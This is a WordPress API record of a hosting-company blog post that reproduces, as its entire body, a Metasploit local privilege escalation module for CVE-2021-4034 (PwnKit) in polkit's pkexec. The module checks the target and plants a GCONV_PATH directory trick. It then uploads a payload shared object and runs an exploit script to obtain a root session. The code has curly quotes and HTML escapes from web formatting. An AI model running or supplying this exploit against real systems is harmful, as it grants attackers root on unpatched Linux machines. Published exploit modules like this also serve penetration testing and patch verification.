{"id":21217,"date":"2022-03-03T20:19:22","date_gmt":"2022-03-03T17:19:22","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166196\/cve_2021_4034_pwnkit_lpe_pkexec.rb.txt"},"modified":"2022-03-06T11:37:10","modified_gmt":"2022-03-06T08:07:10","slug":"polkit-pkexec-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/polkit-pkexec-local-privilege-escalation\/","title":{"rendered":"Polkit pkexec Local Privilege Escalation"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Local
\nRank = ExcellentRanking<\/p>\n

include Msf::Post::File
\ninclude Msf::Post::Linux::Priv
\ninclude Msf::Post::Linux::Kernel
\ninclude Msf::Post::Linux::System
\ninclude Msf::Exploit::EXE
\ninclude Msf::Exploit::FileDropper<\/p>\n

prepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Local Privilege Escalation in polkits pkexec’,
\n‘Description’ => %q{
\nA bug exists in the polkit pkexec binary in how it processes arguments. If
\nthe binary is provided with no arguments, it will continue to process environment
\nvariables as argument variables, but without any security checking.
\nBy using the execve call we can specify a null argument list and populate the
\nproper environment variables. This exploit is architecture independent.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘Qualys Security’, # Original vulnerability discovery
\n‘Andris Raugulis’, # Exploit writeup and PoC
\n‘Dhiraj Mishra’, # Metasploit Module
\n‘bwatters-r7’ # Metasploit Module
\n],
\n‘DisclosureDate’ => ‘2022-01-25’,
\n‘Platform’ => [ ‘linux’ ],
\n‘SessionTypes’ => [ ‘shell’, ‘meterpreter’ ],
\n‘Targets’ => [
\n[
\n‘x86_64’,
\n{
\n‘Arch’ => [ ARCH_X64 ]\n}
\n],
\n[
\n‘x86’,
\n{
\n‘Arch’ => [ ARCH_X86 ]\n}
\n],
\n[
\n‘aarch64’,
\n{
\n‘Arch’ => [ ARCH_AARCH64 ]\n}
\n]\n],
\n‘DefaultTarget’ => 0,
\n‘DefaultOptions’ => {
\n‘PrependSetgid’ => true,
\n‘PrependSetuid’ => true
\n},
\n‘Privileged’ => true,
\n‘References’ => [
\n[ ‘CVE’, ‘2021-4034’ ],
\n[ ‘URL’, ‘https:\/\/www.whitesourcesoftware.com\/resources\/blog\/polkit-pkexec-vulnerability-cve-2021-4034\/’ ],
\n[ ‘URL’, ‘https:\/\/www.qualys.com\/2022\/01\/25\/cve-2021-4034\/pwnkit.txt’ ],
\n[ ‘URL’, ‘https:\/\/github.com\/arthepsy\/CVE-2021-4034’ ], # PoC Reference
\n[ ‘URL’, ‘https:\/\/www.ramanean.com\/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit\/’ ], # Vuln versions
\n[ ‘URL’, ‘https:\/\/github.com\/cyberark\/PwnKit-Hunter\/blob\/main\/CVE-2021-4034_Finder.py’ ] # vuln versions
\n],
\n‘Notes’ => {
\n‘Reliability’ => [ REPEATABLE_SESSION ],
\n‘Stability’ => [ CRASH_SAFE ],
\n‘SideEffects’ => [ ARTIFACTS_ON_DISK ]\n}
\n)
\n)
\nregister_options([
\nOptString.new(‘WRITABLE_DIR’, [ true, ‘A directory where we can write files’, ‘\/tmp’ ]),
\nOptString.new(‘PKEXEC_PATH’, [ false, ‘The path to pkexec binary’, ” ])
\n])
\nregister_advanced_options([
\nOptString.new(‘FinalDir’, [ true, ‘A directory to move to after the exploit completes’, ‘\/’ ]),
\n])
\nend<\/p>\n

def on_new_session(new_session)
\n# The directory the payload launches in gets deleted and breaks some commands
\n# unless we change into a directory that exists
\nsuper
\nold_session = @session
\n@session = new_session
\ncd(datastore[‘FinalDir’])
\n@session = old_session
\nend<\/p>\n

def find_pkexec
\nvprint_status(‘Locating pkexec…’)
\nif exists?(pkexec = cmd_exec(‘which pkexec’))
\nvprint_status(“Found pkexec here: #{pkexec}”)
\nreturn pkexec
\nend<\/p>\n

return nil
\nend<\/p>\n

def check
\n# Is the arch supported?
\narch = kernel_hardware
\nunless arch.include?(‘x86_64’) || arch.include?(‘aarch64’) || arch.include?(‘x86’)
\nreturn CheckCode::Safe(“System architecture #{arch} is not supported”)
\nend<\/p>\n

# check the binary
\npkexec_path = datastore[‘PKEXEC_PATH’]\npkexec_path = find_pkexec if pkexec_path.empty?
\nreturn CheckCode::Safe(‘The pkexec binary was not found; try populating PkexecPath’) if pkexec_path.nil?<\/p>\n

# we don’t use the reported version, but it can help with troubleshooting
\nversion_output = cmd_exec(“#{pkexec_path} –version”)
\nversion_array = version_output.split(‘ ‘)
\nif version_array.length > 2
\npkexec_version = Rex::Version.new(version_array[2])
\nvprint_status(“Found pkexec version #{pkexec_version}”)
\nend<\/p>\n

return CheckCode::Safe(‘The pkexec binary setuid is not set’) unless setuid?(pkexec_path)<\/p>\n

# Grab the package version if we can to help troubleshoot
\nsysinfo = get_sysinfo
\nbegin
\nif sysinfo[:distro] =~ \/[dD]ebian\/
\nvprint_status(‘Determined host os is Debian’)
\npackage_data = cmd_exec(‘dpkg -s policykit-1’)
\npulled_version = package_data.scan(\/Version:\\s(.*)\/)[0][0]\nvprint_status(“Polkit package version = #{pulled_version}”)
\nend
\nif sysinfo[:distro] =~ \/[uU]buntu\/
\nvprint_status(‘Determined host os is Ubuntu’)
\npackage_data = cmd_exec(‘dpkg -s policykit-1’)
\npulled_version = package_data.scan(\/Version:\\s(.*)\/)[0][0]\nvprint_status(“Polkit package version = #{pulled_version}”)
\nend
\nif sysinfo[:distro] =~ \/[cC]entos\/
\nvprint_status(‘Determined host os is CentOS’)
\npackage_data = cmd_exec(‘rpm -qa | grep polkit’)
\nvprint_status(“Polkit package version = #{package_data}”)
\nend
\nrescue StandardError => e
\nvprint_status(“Caught exception #{e} Attempting to retrieve polkit package value.”)
\nend<\/p>\n

if sysinfo[:distro] =~ \/[fF]edora\/
\n# Fedora should be supported, and it passes the check otherwise, but it just
\n# does not seem to work. I am not sure why. I have tried with SeLinux disabled.
\nreturn CheckCode::Safe(‘Fedora is not supported’)
\nend<\/p>\n

# run the exploit in check mode if everything looks right
\nif run_exploit(true)
\nreturn CheckCode::Vulnerable
\nend<\/p>\n

return CheckCode::Safe(‘The target does not appear vulnerable’)
\nend<\/p>\n

def find_exec_program
\nreturn ‘python’ if command_exists?(‘python’)
\nreturn ‘python3’ if command_exists?(‘python3’)<\/p>\n

return nil
\nend<\/p>\n

def run_exploit(check)
\nif is_root? && !datastore[‘ForceExploit’]\nfail_with Failure::BadConfig, ‘Session already has root privileges. Set ForceExploit to override.’
\nend<\/p>\n

arch = kernel_hardware
\nvprint_status(“Detected architecture: #{arch}”)
\nif (arch.include?(‘x86_64’) && payload.arch.first.include?(‘aarch’)) || (arch.include?(‘aarch’) && !payload.arch.first.include?(‘aarch’))
\nfail_with(Failure::BadConfig, ‘Host\/payload Mismatch; set target and select matching payload’)
\nend<\/p>\n

pkexec_path = datastore[‘PKEXEC_PATH’]\nif pkexec_path.empty?
\npkexec_path = find_pkexec
\nend<\/p>\n

python_binary = find_exec_program<\/p>\n

# Do we have the pkexec binary?
\nif pkexec_path.nil?
\nfail_with Failure::NotFound, ‘The pkexec binary was not found; try populating PkexecPath’
\nend<\/p>\n

# Do we have the python binary?
\nif python_binary.nil?
\nfail_with Failure::NotFound, ‘The python binary was not found; try populating PythonPath’
\nend<\/p>\n

unless writable? datastore[‘WRITABLE_DIR’]\nfail_with Failure::BadConfig, “#{datastore[‘WRITABLE_DIR’]} is not writable”
\nend<\/p>\n

local_dir = “.#{Rex::Text.rand_text_alpha_lower(6..12)}”
\nworking_dir = “#{datastore[‘WRITABLE_DIR’]}\/#{local_dir}”
\nmkdir(working_dir)
\nregister_dir_for_cleanup(working_dir)<\/p>\n

random_string_1 = Rex::Text.rand_text_alpha_lower(6..12).to_s
\nrandom_string_2 = Rex::Text.rand_text_alpha_lower(6..12).to_s
\n@old_wd = pwd
\ncd(working_dir)
\ncmd_exec(‘mkdir -p GCONV_PATH=.’)
\ncmd_exec(“touch GCONV_PATH=.\/#{random_string_1}”)
\ncmd_exec(“chmod a+x GCONV_PATH=.\/#{random_string_1}”)
\ncmd_exec(“mkdir -p #{random_string_1}”)<\/p>\n

payload_file = “#{working_dir}\/#{random_string_1}\/#{random_string_1}.so”
\nunless check
\nupload_and_chmodx(payload_file.to_s, generate_payload_dll)
\nregister_file_for_cleanup(payload_file)
\nend<\/p>\n

exploit_file = “#{working_dir}\/.#{Rex::Text.rand_text_alpha_lower(6..12)}”<\/p>\n

write_file(exploit_file, exploit_data(‘CVE-2021-4034’, ‘cve_2021_4034.py’))
\nregister_file_for_cleanup(exploit_file)<\/p>\n

cmd = “#{python_binary} #{exploit_file} #{pkexec_path} #{payload_file} #{random_string_1} #{random_string_2}”
\nprint_warning(“Verify cleanup of #{working_dir}”)
\nvprint_status(“Running #{cmd}”)
\noutput = cmd_exec(cmd)<\/p>\n

# Return to the old working directory before we delete working_directory
\ncd(@old_wd)
\ncmd_exec(“rm -rf #{working_dir}”)
\nvprint_status(output) unless output.empty?
\n# Return proper value if we are using exploit-as-a-check
\nif check
\nreturn false if output.include?(‘pkexec –version’)<\/p>\n

return true
\nend
\nend<\/p>\n

def exploit
\nrun_exploit(false)
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Local Privilege Escalation in polkits pkexec’, ‘Description’ => %q{ A bug exists in …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21217","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21217","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21217"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21217\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21217"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}